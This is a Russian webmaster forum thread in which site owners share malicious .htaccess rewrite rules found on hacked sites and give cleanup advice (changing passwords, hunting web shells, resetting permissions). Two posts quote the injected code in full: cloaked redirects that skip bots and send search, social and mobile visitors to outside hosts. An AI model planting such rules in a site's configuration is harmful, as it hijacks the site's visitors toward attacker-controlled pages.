X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

Открыть тему
Тема закрыта
> Вредоносный код в .htaccess
VitaL
VitaL
Topic Starter сообщение 24.8.2012, 2:38; Ответить: VitaL
Сообщение #1


Новичок
*

Группа: User
Сообщений: 28
Регистрация: 1.8.2010
Поблагодарили: 3 раза
Репутация:   0  


Обнаружил у себя на сайте в файле .htaccess вредоносный код.

Если кто то сталкивался с этим отпишитесь, что этот код творит...

До 626 линии нет кода, после начинается следующее

<IfModule prefork.c>
RewriteEngine On
RewriteCond %{REQUEST_METHOD}   ^GET$
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(tweet|twit|linkedin|instagram|facebook\.|myspace\.|bebo\.|hi5\.|friendster\.|google\.|yahoo\.|bing\.|msn\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|metacrawler\.|mail\.|dogpile\?).*$   [NC]
RewriteCond %{HTTP_REFERER}     !^.*(imgres\?q).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Diagnostics|DTAAgent|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$   [NC]
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png|.*jpeg|.*mpg|.*avi|.*zip|.*gz|.*tar|.*ico$ [NC]
RewriteCond %{REMOTE_ADDR}      !^66\.249.*$ [NC]
RewriteCond %{REMOTE_ADDR}      !^74\.125.*$ [NC]
RewriteCond %{HTTP_COOKIE}      !^.*HYM.*$ [NC]
RewriteCond %{HTTP_USER_AGENT}  .*Windows.* [NC]
RewriteCond %{HTTPS}            ^off$
RewriteRule ^(.*)$              http://kaewnet.curitibacaminhoes.com/url?sa=X&source=web&cd=13&ved=0TQ4CEOow&url=http://%{HTTP_HOST}%{REQUEST_URI}&ei=2ZIhc6jI6Ka3pI2Izl0y+5e1oQ==&usg=Bc19MGKyAxuO9BYLubl0fq&sig2=QbYa6jzfQq9fhfP0lE6fJM  [R=302,L,CO=HYM:13:%{HTTP_HOST}:10766:/:0:HttpOnly]
</IfModule>
#6e70ab23e795bf66c782f69ef941fe94d2d0449dca490951bafbf4d9
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
poroch
poroch
сообщение 24.8.2012, 3:04; Ответить: poroch
Сообщение #2


Участник
***

Группа: User
Сообщений: 226
Регистрация: 23.2.2011
Поблагодарили: 23 раза
Репутация:   4  


было похожее, редиректило мобильный траф на левые партнерки =\
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
AmoSeo
AmoSeo
сообщение 24.8.2012, 3:21; Ответить: AmoSeo
Сообщение #3


Завсегдатай
*****

Группа: Active User
Сообщений: 523
Регистрация: 10.6.2011
Поблагодарили: 130 раз
Репутация:   22  


Первым делом смените пароли на ftp, панель управления на хостинге, email.
Сталкивался с подобным инородным кодом в .htaccess который после родного кода находился с большим отступом внизу.
Например у меня на 296 линии начало инородного кода такое было:
RewriteEngine   on
RewriteCond    %{HTTP_USER_AGENT}  (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|windows\ phone)  [NC]
RewriteCond    %{HTTP_USER_AGENT}  !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|dcpbot|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_vali
dator|jigsaw|webalta|yahoofeedseeker|yahoo!\ slurp|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yande
xaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yande
x
imageresizer)    [NC]
RewriteRule    (.*)    http://browser77.com/u/4393    [L,R=302]

Возможно он стоял продолжительное время, а обнаружил когда один из пользователей пжаловался что с мобилы нельзя сайт посмотреть типо редиректит на google
Почистил и сменил выше указанные пароли.

Сообщение отредактировал AmoSeo - 24.8.2012, 3:22


--------------------
Предоставляю услуги: Content Downloader - настройка парсера для любого сайта. (опыт с 2011 г.)
Наполнение магазинов товарами: Opencart, SimplaCMS, Webasyst и т.д.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
BestProxies
BestProxies
сообщение 24.8.2012, 7:20; Ответить: BestProxies
Сообщение #4


Частый гость
**

Группа: User
Сообщений: 62
Регистрация: 13.8.2012
Поблагодарили: 8 раз
Репутация:   1  


Думаю сменить пароли будет недостаточно, во-первых, на хост уже скорее всего залит веб-шелл, во вторых, этот шелл могли залить используя какую-то уязвимость (ошибку программирования), имеющуюся на сайте, так что нужно ещё найти и удалить шелл, и попытаться понять, каким образом его залили. Помочь в этом может анализ логов доступа к веб-серверу.


--------------------
Best-Proxies.ru - тысячи проверенных свежих прокси, недорого
Прокси проверяются на работу с Яндекс, Google, Twitter, Mail.ru и на возможность отправки почты
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
RageLT
RageLT
сообщение 24.8.2012, 8:34; Ответить: RageLT
Сообщение #5


Участник
***

Группа: User
Сообщений: 145
Регистрация: 1.10.2009
Поблагодарили: 52 раза
Репутация:   14  


Совсем недавно столкнулся с такой же проблемой. Сайты работали на joomle. У одного из них файлы имели права на исполнение, что позволяли злоумышленниками менять на всех сайтах .htaccess файлики. Скорее всего программно простукиваются сайты и дёргается определённый файл.
Саму джуму не трогал, просто рекурсивно пробежался и выставил файлам правильные права, заодно и директориям. Проблема пропала.

Как я понял доступ по ssh есть, вот попробуй.

cd /www
find . -type d -exec chmod 755 {} \;
find . -type f -exec chmod 644 {} \;


--------------------
Велосипед и жену не доверяй никому!
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
0alex1
0alex1
сообщение 24.8.2012, 10:41; Ответить: 0alex1
Сообщение #6


Старожил
******

Группа: Active User
Сообщений: 1249
Регистрация: 8.7.2010
Поблагодарили: 412 раз
Репутация:   60  


Была не давно такая же ситуация на таймвебе. На всех сайтах, оклоо 20 шутк, не зависимо от движка в файле .htaccess появился в конце кусок кода. Редиректил на какую то гадость, но не при каждом обращении к сайту. Некоторые сайты при этом вообще перестали работать, поэтому сразу и обнаружил. Удалил эти куски и все. Было ощущение что сам сервер взломали и программно добавили во все файлы .htaccess один и тот же код вне зависимости от результата.


--------------------
Взять Кредит Webmoney тут
Лучшие биржи ссылок wmr1000 - Хороший хостинг там
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Aqaus
Aqaus
сообщение 24.8.2012, 11:32; Ответить: Aqaus
Сообщение #7


Частый гость
**

Группа: User
Сообщений: 62
Регистрация: 17.8.2009
Из: Украина
Поблагодарили: 9 раз
Репутация:   -1  


cd /www
find . -type d -exec chmod 755 {} \;
find . -type f -exec chmod 644 {} \

Без ssh можно admin tools сделать.

Надо анализировать, через что ломали. Повторится может.


--------------------
Меня и мои услуги можно найти тут
Помог? Поставь плюс.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Rxp
Rxp
сообщение 24.8.2012, 21:36; Ответить: Rxp
Сообщение #8


Участник
***


Группа: User
Сообщений: 115
Регистрация: 9.11.2008
Поблагодарили: 21 раз
Репутация:   10  


Станлартная ситуация при взломанном сайте или хосте, обращайтесь проверим все на вирусы, сам сервак + дадим рекомендации!

Сообщение отредактировал Rxp - 24.8.2012, 21:50


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
VitaL
VitaL
Topic Starter сообщение 25.8.2012, 17:32; Ответить: VitaL
Сообщение #9


Новичок
*

Группа: User
Сообщений: 28
Регистрация: 1.8.2010
Поблагодарили: 3 раза
Репутация:   0  


Мне было интересно, что этот код делал, сайт я уже почистил. Всем спасибо за ответы.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Проблема с 301 редиректом в htaccess
не срабатывает с (без www) на www
14 danc1r0k 1977 2.11.2017, 14:44
автор: vadosseo
Открытая тема (нет новых ответов) Тема имеет прикрепленные файлыPHP код для og:image в Джумла
Нужен PHP код для заполнения мета тега meta property
8 Курыкин 1349 25.10.2017, 12:06
автор: Fassendek
Открытая тема (нет новых ответов) Редирект в ModX через .htaccess коряво работает
9 kstnews 676 15.10.2017, 21:12
автор: x64
Открытая тема (нет новых ответов) Промо код Гугл Эдвордс 2000 рублей
Может кому то будет нужен
3 alllffa 862 9.10.2017, 12:12
автор: alllffa
Открытая тема (нет новых ответов) Наладить htaccess на Wordpress
2 LebedevStr 547 25.5.2017, 14:14
автор: LebedevStr


 



RSS Текстовая версия Сейчас: 14.12.2017, 1:13
Дизайн